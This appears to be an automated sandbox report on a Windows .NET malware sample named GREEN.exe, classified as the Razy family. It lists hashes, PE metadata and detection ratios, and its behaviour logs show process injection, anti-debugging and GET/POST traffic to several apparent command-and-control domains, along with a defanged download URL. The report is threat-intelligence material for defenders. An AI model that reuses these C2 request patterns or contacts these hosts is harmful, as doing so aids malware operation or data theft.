File details | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 322.50 KB (330240 bytes) |
Compile time: | 2018-08-13 00:46:47 |
MD5: | 1834ecf107b4610f6fef59deff0a35e7 |
SHA1: | 2292f681508131386c8f76e13a53571741e608c5 |
SHA256: | 666243d5e3e443568e46085988f370196d7dc609891a4409c69a28ef57973ed2 |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 3 | import resource relocation |
First submission: | 2018-09-09 19:36:06 |
Last submission: | 2018-09-09 19:36:06 |
Filename detected: |
- GREEN.exe (1) |
URL file hosting |
---|
hXXp://garduherbal.com/GREEN.exe |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2018-09-09 13:20:21 | [50/68] | |
PE Sections 3 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x4f384 | 324608 | b44df4fd225970e52d617ac86a3fc112 | 9b47c10d6e142d2b7a91033f19819967e500cc66 |
.rsrc | 0x52000 | 0x1000 | 4096 | f3fbc2248364edf95da86fafa59e90e7 | adccbce07b4b021717864f747a129e3c4c0d9aa5 |
.reloc | 0x54000 | 0xc | 512 | c2da1ed43523ff7f52f13044a8a627c9 | 2980273af7bb0a4d38c0aeeb77cb84e7c04c0037 |
PE Resources | |||||
---|---|---|---|---|---|
Name | Offset | Size | Language | Sublanguage | Data |
RT_VERSION | 0x52058 | 756 | LANG_NEUTRAL | SUBLANG_NEUTRAL |
- API Alert
- Anti Debug
Meta Info | |
---|---|
LegalCopyright: | Gmz7wrp |
Assembly Version: | 80.53.46.27 |
InternalName: | GREEN.exe |
FileVersion: | 29.25.54.15 |
CompanyName: | BW8WThH |
Comments: | 2t2RzFK |
ProductName: | zNl1JPs |
ProductVersion: | 29.25.54.15 |
FileDescription: | a5HborC |
Translation: | 0x0000 0x04b0 |
OriginalFilename: | GREEN.exe |
XOR | |
---|---|
8 | 230664 |
1 | 230664 |
2 | 230664 |
4 | 230664 |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
File type: Library | |
mscoree.dll |
IP Found | |
---|---|
29.25.54.15 | |
80.53.46.27 |
URL(s) | |
---|---|
No URL found |
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04_64 | Seven04_64 | VirtualBox | 2018-09-09 19:32:31 | 2018-09-09 19:35:28 | 177 |
10 Behaviors detected by system signatures
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: Traffico Anomalo: Traffico verso host malevolo, GET HTTP Content "db" (Soc-Rule)
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: GREEN.exe(2504) -> GREEN.exe(2460)
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.39, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0004f400, virtual_size: 0x0004f384
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://www.promcy.com/ga/?ETUTzJu=+Sm2vG0/c8A/pCDamCk/SQbgsVa/WUoYV9BIqR9+i6t3xcR6Ew9ieOy6HjnP1pm58AxStRWG&DxoHW=VDKPcDdPwnEd1V
- url: http://www.no3.world/ga/?ETUTzJu=rXonpmMDn1Ay58F/q8U7Em9uDIcx766tcys3mrcPCll1+ZItMc3Gng2MbOBGaSsslENxZrjS&DxoHW=VDKPcDdPwnEd1V
- url: http://www.no3.world/ga/
- url: http://www.mycherrygum.com/ga/?ETUTzJu=96D4Tkb3WzZ7Mh1tqKKYtqZf0GHD+VbvMLkslyCFKk/Y+vDBUqtqFS0yrhmBLhTmLzbtOzIR&DxoHW=VDKPcDdPwnEd1V
- url: http://www.mycherrygum.com/ga/
- url: http://www.mazda-2.com/ga/?ETUTzJu=enjcgrafWS8oV2xepRj8R+AtfVpCO6WxAm3PGsmAuNISnYf4ikZntusvq9tbZUCz4q/sRwwv&DxoHW=VDKPcDdPwnEd1V
- url: http://www.mazda-2.com/ga/
- url: http://www.modaness.com/ga/?ETUTzJu=WmfJ7BdalHyJ4qs+tgp3ACHleifwv7FnXhNg08PKGoiouH1UjhiO17EHFc5P14hW00qDOV+P&DxoHW=VDKPcDdPwnEd1V
- url: http://www.modaness.com/ga/
- url: http://www.resourceonbench.com/ga/?ETUTzJu=0R3c8C8bGa5AtKYbifh1nbehrtLKQQx7GrR/2s9C+Nqh34VcKzzMvkn0+leQ2vR1YrxENmwj&DxoHW=VDKPcDdPwnEd1V
- url: http://www.resourceonbench.com/ga/
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
Dynamic (imported) function loading detected
Severity: Medium
Confidence: Very High
Guard pages use detected - possible anti-debugging.
Severity: Medium
Confidence: Very High
Creates RWX memory
Severity: Medium
Confidence: Medium
SetUnhandledExceptionFilter detected (possible anti-debug)
Severity: Low
Confidence: Very High
8 Summary items with data
Files
Read Files
Write Files
Nothing to display
Delete Files
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2504.15743750 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2504.15743750 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2504.15743859
Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6c68293a\11335d01 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|GREEN.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|GREEN.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|GREEN.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6c68293a\32515038 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
Read Keys
Write Keys
Nothing to display
Delete Keys
Nothing to display
Mutexes
Global\CLR_CASOFF_MUTEX
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW kernel32.dll.InitializeCriticalSectionAndSpinCount kernel32.dll.IsProcessorFeaturePresent msvcrt.dll._set_error_mode msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z kernel32.dll.FindActCtxSectionStringW kernel32.dll.GetSystemWindowsDirectoryW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap mscorwks.dll._CorExeMain mscorwks.dll.GetCLRFunction advapi32.dll.RegisterTraceGuidsW advapi32.dll.UnregisterTraceGuids advapi32.dll.GetTraceLoggerHandle advapi32.dll.GetTraceEnableLevel advapi32.dll.GetTraceEnableFlags advapi32.dll.TraceEvent mscoree.dll.IEE mscoreei.dll.IEE mscorwks.dll.IEE 
mscoree.dll.GetStartupFlags mscoreei.dll.GetStartupFlags mscoree.dll.GetHostConfigurationFile mscoreei.dll.GetHostConfigurationFile mscoreei.dll.GetCORVersion mscoree.dll.GetCORSystemDirectory mscoreei.dll.GetCORSystemDirectory_RetAddr mscoreei.dll.CreateConfigStream ntdll.dll.RtlUnwind kernel32.dll.IsWow64Process advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddVectoredContinueHandler kernel32.dll.RemoveVectoredContinueHandler advapi32.dll.ConvertSidToStringSidW shell32.dll.SHGetFolderPathW kernel32.dll.GetWriteWatch kernel32.dll.ResetWriteWatch kernel32.dll.CreateMemoryResourceNotification kernel32.dll.QueryMemoryResourceNotification kernel32.dll.QueryActCtxW kernel32.dll.GetVersionExW kernel32.dll.GetFullPathNameW ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 ole32.dll.CoGetContextToken advapi32.dll.CryptAcquireContextA advapi32.dll.CryptReleaseContext advapi32.dll.CryptCreateHash advapi32.dll.CryptDestroyHash advapi32.dll.CryptHashData advapi32.dll.CryptGetHashParam advapi32.dll.CryptImportKey advapi32.dll.CryptExportKey advapi32.dll.CryptGenKey advapi32.dll.CryptGetKeyParam advapi32.dll.CryptDestroyKey advapi32.dll.CryptVerifySignatureA advapi32.dll.CryptSignHashA advapi32.dll.CryptGetProvParam advapi32.dll.CryptGetUserKey advapi32.dll.CryptEnumProvidersA mscoree.dll.GetMetaDataInternalInterface mscoreei.dll.GetMetaDataInternalInterface mscorwks.dll.GetMetaDataInternalInterface mscorjit.dll.getJit kernel32.dll.GetUserDefaultUILanguage kernel32.dll.SetErrorMode kernel32.dll.GetFileAttributesExW mscoreei.dll.LoadLibraryShim culture.dll.ConvertLangIdToCultureName kernel32.dll.lstrlen kernel32.dll.lstrlenW mscoree.dll.ND_RI4 mscoreei.dll.ND_RI4 kernel32.dll.VirtualProtect kernel32.dll.GlobalMemoryStatusEx kernel32.dll.GetEnvironmentVariableW kernel32.dll.SwitchToThread kernel32.dll.CloseHandle 
kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW kernel32.dll.GetCurrentProcess advapi32.dll.AdjustTokenPrivileges kernel32.dll.OpenProcess psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW kernel32.dll.GetProcAddress kernel32.dll.DebugActiveProcess kernel32.dll.WaitForDebugEvent kernel32.dll.ContinueDebugEvent kernel32.dll.DeleteFileA advapi32.dll.SetKernelObjectSecurity advapi32.dll.GetKernelObjectSecurity ntdll.dll.NtSetInformationProcess ntdll.dll.NtProtectVirtualMemory kernel32.dll.VirtualAllocEx kernel32.dll.GetThreadContext kernel32.dll.Wow64GetThreadContext ntdll.dll.NtUnmapViewOfSection kernel32.dll.ResumeThread kernel32.dll.SetThreadContext kernel32.dll.Wow64SetThreadContext kernel32.dll.WriteProcessMemory kernel32.dll.ReadProcessMemory kernel32.dll.TerminateProcess kernel32.dll.CreateProcessW ole32.dll.CoUninitialize kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx advapi32.dll.EventUnregister
Execute Commands
"C:\Users\Seven01\AppData\Local\Temp\GREEN.exe"
Started Services
Nothing to display
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04_64 | Seven04_64 | VirtualBox | 2018-09-09 19:32:31 | 2018-09-09 19:35:28 | 177 |
16 HTTP Request(s) detected
http://www.promcy.com/ga/?ETUTzJu=+Sm2vG0/c8A/pCDamCk/SQbgsVa/WUoYV9BIqR9+i6t3xcR6Ew9ieOy6HjnP1pm58AxStRWG&DxoHW=VDKPcDdPwnEd1V
- Hostname: www.promcy.com
- IP Address: 0.0.0.0
- Port: 80
- Count: 1
GET /ga/?ETUTzJu=+Sm2vG0/c8A/pCDamCk/SQbgsVa/WUoYV9BIqR9+i6t3xcR6Ew9ieOy6HjnP1pm58AxStRWG&DxoHW=VDKPcDdPwnEd1V HTTP/1.1 Host: www.promcy.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.no3.world/ga/?ETUTzJu=rXonpmMDn1Ay58F/q8U7Em9uDIcx766tcys3mrcPCll1+ZItMc3Gng2MbOBGaSsslENxZrjS&DxoHW=VDKPcDdPwnEd1V
- Hostname: www.no3.world
- IP Address: 184.168.221.46
- Port: 80
- Count: 1
GET /ga/?ETUTzJu=rXonpmMDn1Ay58F/q8U7Em9uDIcx766tcys3mrcPCll1+ZItMc3Gng2MbOBGaSsslENxZrjS&DxoHW=VDKPcDdPwnEd1V HTTP/1.1 Host: www.no3.world Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.no3.world/ga/
- Hostname: www.no3.world
- IP Address: 184.168.221.46
- Port: 80
- Count: 1
POST /ga/ HTTP/1.1 Host: www.no3.world Connection: close Content-Length: 2201 Cache-Control: no-cache Origin: http://www.no3.world User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.no3.world/ga/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.no3.world/ga/
- Hostname: www.no3.world
- IP Address: 184.168.221.46
- Port: 80
- Count: 1
POST /ga/ HTTP/1.1 Host: www.no3.world Connection: close Content-Length: 57185 Cache-Control: no-cache Origin: http://www.no3.world User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.no3.world/ga/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.mycherrygum.com/ga/?ETUTzJu=96D4Tkb3WzZ7Mh1tqKKYtqZf0GHD+VbvMLkslyCFKk/Y+vDBUqtqFS0yrhmBLhTmLzbtOzIR&DxoHW=VDKPcDdPwnEd1V
- Hostname: www.mycherrygum.com
- IP Address: 150.95.240.245
- Port: 80
- Count: 1
GET /ga/?ETUTzJu=96D4Tkb3WzZ7Mh1tqKKYtqZf0GHD+VbvMLkslyCFKk/Y+vDBUqtqFS0yrhmBLhTmLzbtOzIR&DxoHW=VDKPcDdPwnEd1V HTTP/1.1 Host: www.mycherrygum.com Connection: close
http://www.mycherrygum.com/ga/
- Hostname: www.mycherrygum.com
- IP Address: 150.95.240.245
- Port: 80
- Count: 1
POST /ga/ HTTP/1.1 Host: www.mycherrygum.com Connection: close Content-Length: 2201 Cache-Control: no-cache Origin: http://www.mycherrygum.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mycherrygum.com/ga/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.mycherrygum.com/ga/
- Hostname: www.mycherrygum.com
- IP Address: 150.95.240.245
- Port: 80
- Count: 1
POST /ga/ HTTP/1.1 Host: www.mycherrygum.com Connection: close Content-Length: 57185 Cache-Control: no-cache Origin: http://www.mycherrygum.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mycherrygum.com/ga/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.mazda-2.com/ga/?ETUTzJu=enjcgrafWS8oV2xepRj8R+AtfVpCO6WxAm3PGsmAuNISnYf4ikZntusvq9tbZUCz4q/sRwwv&DxoHW=VDKPcDdPwnEd1V
- Hostname: www.mazda-2.com
- IP Address:
- Port: 80
- Count: 1
GET /ga/?ETUTzJu=enjcgrafWS8oV2xepRj8R+AtfVpCO6WxAm3PGsmAuNISnYf4ikZntusvq9tbZUCz4q/sRwwv&DxoHW=VDKPcDdPwnEd1V HTTP/1.1 Host: www.mazda-2.com Connection: close
http://www.mazda-2.com/ga/
- Hostname: www.mazda-2.com
- IP Address:
- Port: 80
- Count: 1
POST /ga/ HTTP/1.1 Host: www.mazda-2.com Connection: close Content-Length: 2201 Cache-Control: no-cache Origin: http://www.mazda-2.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mazda-2.com/ga/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.mazda-2.com/ga/
- Hostname: www.mazda-2.com
- IP Address:
- Port: 80
- Count: 1
POST /ga/ HTTP/1.1 Host: www.mazda-2.com Connection: close Content-Length: 57185 Cache-Control: no-cache Origin: http://www.mazda-2.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mazda-2.com/ga/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.modaness.com/ga/?ETUTzJu=WmfJ7BdalHyJ4qs+tgp3ACHleifwv7FnXhNg08PKGoiouH1UjhiO17EHFc5P14hW00qDOV+P&DxoHW=VDKPcDdPwnEd1V
- Hostname: www.modaness.com
- IP Address:
- Port: 80
- Count: 1
GET /ga/?ETUTzJu=WmfJ7BdalHyJ4qs+tgp3ACHleifwv7FnXhNg08PKGoiouH1UjhiO17EHFc5P14hW00qDOV+P&DxoHW=VDKPcDdPwnEd1V HTTP/1.1 Host: www.modaness.com Connection: close
http://www.modaness.com/ga/
- Hostname: www.modaness.com
- IP Address:
- Port: 80
- Count: 1
POST /ga/ HTTP/1.1 Host: www.modaness.com Connection: close Content-Length: 2201 Cache-Control: no-cache Origin: http://www.modaness.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.modaness.com/ga/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.modaness.com/ga/
- Hostname: www.modaness.com
- IP Address:
- Port: 80
- Count: 1
POST /ga/ HTTP/1.1 Host: www.modaness.com Connection: close Content-Length: 57185 Cache-Control: no-cache Origin: http://www.modaness.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.modaness.com/ga/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.resourceonbench.com/ga/?ETUTzJu=0R3c8C8bGa5AtKYbifh1nbehrtLKQQx7GrR/2s9C+Nqh34VcKzzMvkn0+leQ2vR1YrxENmwj&DxoHW=VDKPcDdPwnEd1V
- Hostname: www.resourceonbench.com
- IP Address: 69.90.66.250
- Port: 80
- Count: 1
GET /ga/?ETUTzJu=0R3c8C8bGa5AtKYbifh1nbehrtLKQQx7GrR/2s9C+Nqh34VcKzzMvkn0+leQ2vR1YrxENmwj&DxoHW=VDKPcDdPwnEd1V HTTP/1.1 Host: www.resourceonbench.com Connection: close
http://www.resourceonbench.com/ga/
- Hostname: www.resourceonbench.com
- IP Address: 69.90.66.250
- Port: 80
- Count: 1
POST /ga/ HTTP/1.1 Host: www.resourceonbench.com Connection: close Content-Length: 2201 Cache-Control: no-cache Origin: http://www.resourceonbench.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.resourceonbench.com/ga/ Accept-Language: en-US Accept-Encoding: gzip, deflate
http://www.resourceonbench.com/ga/
- Hostname: www.resourceonbench.com
- IP Address: 69.90.66.250
- Port: 80
- Count: 1
POST /ga/ HTTP/1.1 Host: www.resourceonbench.com Connection: close Content-Length: 57185 Cache-Control: no-cache Origin: http://www.resourceonbench.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.resourceonbench.com/ga/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Detected family: #Razy
TheSystem Itself @ 2018-09-09 19:54:03
#infosec #automation
TheSystem Itself @ 2018-09-09 19:36:22